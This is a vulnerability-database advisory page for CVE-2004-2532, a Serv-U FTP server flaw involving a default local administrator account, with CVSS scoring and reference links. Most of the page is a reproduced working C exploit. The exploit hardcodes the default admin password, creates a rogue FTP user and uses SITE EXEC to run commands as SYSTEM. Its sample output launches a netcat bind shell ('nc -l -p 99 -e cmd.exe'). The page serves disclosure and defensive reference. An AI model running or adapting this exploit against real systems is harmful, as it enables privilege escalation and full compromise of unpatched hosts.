CVE-2004-2532
CVSS 10.0
Published: 2004-12-31 00:00:00
Last revised: 2010-04-27 15:28:18

[Original text] Serv-U FTP server before 5.1.0.0 has a default account and password for local administration, which allows local users to execute arbitrary commands by connecting to the server using the default administrator account, creating a new user, logging in as that new user, and then using the SITE EXEC command.


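[CNNVD] RhinoSoft Serv-U FTP Server Default Administration Account Vulnerability (CNNVD-200412-693)

        Serv-U FTP server versions before 5.1.0.0 have a default account and password for local administration. A local user can execute arbitrary commands by connecting to the server with the default administrator account, creating a new user, logging in as that new user, and then using the SITE EXEC command.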

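- CVSS (Base Score)

CVSS score: 10 [Severe (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may render the system completely unavailable]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CWE (Weakness Category)

CWE-255 [Credentials Management]

- CPE (Affected Platforms and Products)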

cpe:/a:serv-u:serv-u:4.1.0.3    Serv-U 4.1.0.3
cpe:/a:serv-u:serv-u:4.0.0.4    Serv-U 4.0.0.4
cpe:/a:serv-u:serv-u:4.1.0.0    Serv-U 4.1.0.0
cpe:/a:serv-u:serv-u:3.1.0.3    Serv-U 3.1.0.3
cpe:/a:serv-u:serv-u:3.1.0.0    Serv-U 3.1.0.0
cpe:/a:serv-u:serv-u:5.0.0.9    Serv-U 5.0.0.9
cpe:/a:serv-u:serv-u:3.0.0.16    Serv-U 3.0.0.16
cpe:/a:serv-u:serv-u:3.1.0.1    Serv-U 3.1.0.1
cpe:/a:serv-u:serv-u:3.0.0.17    Serv-U 3.0.0.17
cpe:/a:serv-u:serv-u:5.0.0.11    Serv-U 5.0.0.11
cpe:/a:serv-u:serv-u:5.0.0.0    Serv-U 5.0.0.0
cpe:/a:serv-u:serv-u:5.0.0.4    Serv-U 5.0.0.4

- OVAL (Technical Details for Detection)

No related OVAL definition found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2532
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2532
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-693
(Official data source) CNNVD

- Other Links and Resources

http://xforce.iss.net/xforce/xfdb/16925
(UNKNOWN)  XF  servu-default-admin-account(16925)
http://www.securityfocus.com/bid/10886
(UNKNOWN)  BID  10886
http://www.osvdb.org/8877
(UNKNOWN)  OSVDB  8877
http://archives.neohapsis.com/archives/fulldisclosure/2004-08/0216.html
(UNKNOWN)  FULLDISC  20040808 Serv-U 3.x, 4.x, 5.x local privilege escalation vulnerability

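- Vulnerability Information

RhinoSoft Serv-U FTP Server Default Administration Account Vulnerability
Critical    Design error
2004-12-31 00:00:00 2010-04-27 00:00:00
Local
        Serv-U FTP server versions before 5.1.0.0 have a default account and password for local administration. A local user can execute arbitrary commands by connecting to the server with the default administrator account, creating a new user, logging in as that new user, and then using the SITE EXEC command.

- Advisories and Patches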

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- Vulnerability Information (381)

Serv-U 3x - 5.x Local Privilege Escalation Exploit (EDBID:381)
windows local
2004-08-08 Verified
0 Andrés Acunha
/*
 * Hax0rcitos proudly presents
 * Serv-u Local Exploit >v3.x. (tested also against last version 5.1.0.0)
 *
 * All Serv-u Versions have default Login/password for local Administration.
 * This account is only available to connect in the loopback interface, so a
 * local user will be able to connect to Serv-u with this account and create
 * an ftp user with execute rights. after the user is created, just connect
 * to the ftp server and execute a raw "SITE EXEC" command. the program will
 * be execute with SYSTEM privileges.
 *
 * Copyright (c) 2003-2004  Haxorcitos com . All Rights Reserved.
 *
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
 * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
 * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 *
 *
 * Date:   10/2003
 * Author: Andrés Tarascó Acunha
 *
 * Greetings to: #haxorcitos - #localhost and #!dsr blackxors =)
 *
 * Tested Against Serv-u 4.x and v5.1.0.0

         G:\exploit\serv-U\local>whoami
        INSANE\aT4r

        G:\exploit\serv-U\local>servulocal.exe "nc -l -p 99 -e cmd.exe"
        Serv-u >3.x Local Exploit by Haxorcitos

        <220 Serv-U FTP Server v5.0 for WinSock ready...
        >USER LocalAdministrator
        <331 User name okay, need password.
        ******************************************************
        >PASS #l@$ak#.lk;0@P
        <230 User logged in, proceed.
        ******************************************************
        >SITE MAINTENANCE
        ******************************************************
        [+] Creating New Domain...
        <200-DomainID=3
        220 Domain settings saved
        ******************************************************
        [+] Domain Haxorcitos:3 Created
        [+] Setting New Domain Online
        <220 Server command OK
        ******************************************************
        [+] Creating Evil User
        <200-User=haxorcitos
        200 User settings saved
        ******************************************************
        [+] Now Exploiting...
        >USER haxorcitos
        <331 User name okay, need password.
        ******************************************************
        >PASS whitex0r
        <230 User logged in, proceed.
        ******************************************************
        [+] Now Executing: nc -l -p 99 -e cmd.exe
        <220 Domain deleted
        ******************************************************
         G:\exploit\serv-U\local>nc localhost 99
        Microsoft Windows XP [Versión 5.1.2600]
        (C) Copyright 1985-2001 Microsoft Corp.

        C:\>whoami
        whoami
        NT AUTHORITY\SYSTEM
         C:\>
  */

#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <io.h>
#include <process.h>

//Responses
#define BANNER                  "220 "
#define USEROK                  "331 User name okay"
#define PASSOK                  "230 User logged in, proceed."
#define ADMOK                   "230-Switching to SYSTEM MAINTENANCE mode."
#define DOMAINID                "200-DomainID="
//Commands

#define XPLUSER                    "USER haxorcitos\r\n"
#define XPLPASSWORD                "PASS whitex0r\r\n"
#define USER                    "USER LocalAdministrator\r\n"
#define PASSWORD                "PASS #l@$ak#.lk;0@P\r\n"

#define MAINTENANCE             "SITE MAINTENANCE\r\n"
#define EXIT                    "QUIT\r\n"
char newdomain[]="-SETDOMAIN\r\n"
                 "-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n"
		 "-TZOEnable=0\r\n"
		 " TZOKey=\r\n";
/*               "-DynDNSEnable=0\r\n"
                 " DynIPName=\r\n";
*/
char deldomain[]="-DELETEDOMAIN\r\n"
                 "-IP=0.0.0.0\r\n"
                 " PortNo=2121\r\n";

char newuser[] =
                "-SETUSERSETUP\r\n"
                "-IP=0.0.0.0\r\n"
                "-PortNo=2121\r\n"
                "-User=haxorcitos\r\n"
                "-Password=whitex0r\r\n"
                "-HomeDir=c:\\\r\n"
                "-LoginMesFile=\r\n"
                "-Disable=0\r\n"
                "-RelPaths=1\r\n"
                "-NeedSecure=0\r\n"
                "-HideHidden=0\r\n"
                "-AlwaysAllowLogin=0\r\n"
                "-ChangePassword=0\r\n"
                "-QuotaEnable=0\r\n"
                "-MaxUsersLoginPerIP=-1\r\n"
                "-SpeedLimitUp=0\r\n"
                "-SpeedLimitDown=0\r\n"
                "-MaxNrUsers=-1\r\n"
                "-IdleTimeOut=600\r\n"
                "-SessionTimeOut=-1\r\n"
                "-Expire=0\r\n"
                "-RatioUp=1\r\n"
                "-RatioDown=1\r\n"
                "-RatiosCredit=0\r\n"
                "-QuotaCurrent=0\r\n"
                "-QuotaMaximum=0\r\n"
                "-Maintenance=None\r\n"
                "-PasswordType=Regular\r\n"
                "-Ratios=None\r\n"
                " Access=c:\\|RELP\r\n";

#define localport 43958
#define localip "127.0.0.1"

char cadena[1024];
int rec,domain;
/******************************************************************************/

void ParseCommands(int sock, char *data, int ShowSend, int showResponses,
char *response) {
 send(sock,data,strlen(data),0);
 if (ShowSend) printf(">%s",data);
 Sleep(100);
 do {
         rec=recv(sock,cadena,sizeof(cadena),0); cadena[rec]='\0';
         if (rec<=0) return;
         if (showResponses) printf("<%s",cadena);
         if (strncmp(cadena, DOMAINID,strlen(DOMAINID))==0)
                domain=atoi(cadena+strlen(DOMAINID));
 //} while (strncmp(cadena,response,strlen(response))!=0);
 } while (strstr(cadena,response)==NULL);
  printf("******************************************************\r\n");
}
/******************************************************************************/
int main(int argc, char* argv[])
{
	WSADATA ws;
        int sock,sock2;

        struct sockaddr_in haxorcitos;
        struct sockaddr_in xpl;

printf("Serv-u >3.x Local Exploit by Haxorcitos\r\n\r\n");
if (argc<2) {
        printf("USAGE:   ServuLocal.exe \"command\"\r\n");
        printf("Example: ServuLocal.exe \"nc.exe -l -p 99 -e cmd.exe\"");
         return(0);
}

        if	(WSAStartup( MAKEWORD(2,2), &ws )!=0) {
		printf(" [-] WSAStartup() error\n");
		exit(0);
	}

	haxorcitos.sin_family = AF_INET;
	haxorcitos.sin_port = htons(localport);
	haxorcitos.sin_addr.s_addr = inet_addr(localip);
        sock=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
        connect(sock,( struct sockaddr *)&haxorcitos,sizeof(haxorcitos));
        rec=recv(sock,cadena,sizeof(cadena),0); cadena[rec]='\0';
        printf("<%s",cadena);

        ParseCommands(sock,USER,1,1,USEROK);
        ParseCommands(sock,PASSWORD,1,1,PASSOK);
        ParseCommands(sock,MAINTENANCE,1,0,"230 ");

        printf("[+] Creating New Domain...\r\n");
        ParseCommands(sock,newdomain,0,1,BANNER);
        printf("[+] Domain Haxorcitos:%i Created\n",domain);

/* Only for v5.x
        printf("[+] Setting New Domain Online\r\n");
        sprintf(cadena,"-SERVERCOMMAND\r\n-ID=%i\r\n
Command=DomainOnline\r\n",domain);
        ParseCommands(sock,cadena,0,1,BANNER);
*/
        printf("[+] Creating Evil User\r\n");
        ParseCommands(sock,newuser,0,1,"200 ");
        Sleep(1000);

        printf("[+] Now Exploiting...\r\n");
	xpl.sin_family = AF_INET;
	xpl.sin_port = htons(2121);
	xpl.sin_addr.s_addr = inet_addr(localip);
        sock2=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
        connect(sock2,( struct sockaddr *)&xpl,sizeof(xpl));
        rec=recv(sock2,cadena,sizeof(cadena),0); cadena[rec]='\0';
        ParseCommands(sock2,XPLUSER,1,1,USEROK);
        ParseCommands(sock2,XPLPASSWORD,1,1,PASSOK);
        printf("[+] Now Executing: %s\r\n",argv[1]);
        sprintf(cadena,"site exec %s\r\n",argv[1]);
        send(sock2,cadena,strlen(cadena),0);
        shutdown(sock2,SD_BOTH);
        Sleep(100);
        ParseCommands(sock,deldomain,0,1,BANNER);
        send(sock,EXIT,strlen(EXIT),0);
        shutdown(sock,SD_BOTH);
        closesocket(sock);
        closesocket(sock2);

        return 0;
}

// milw0rm.com [2004-08-08]
		

- Vulnerability Information

8877
Serv-U FTP Server Default Account Local System Privilege Escalation
Local Access Required, Local / Remote Authentication Management
Loss of Integrity Solution Unknown
Exploit Public

- Vulnerability Description

Serv-U contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when an attacker uses Serv-U's default administration account to create an FTP user account capable of executing commands with NT AUTHORITY\SYSTEM privileges. This flaw may lead to a loss of integrity.

- Timeline

2004-08-08 Unknown
2004-08-08 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- Related References

- Vulnerability Author
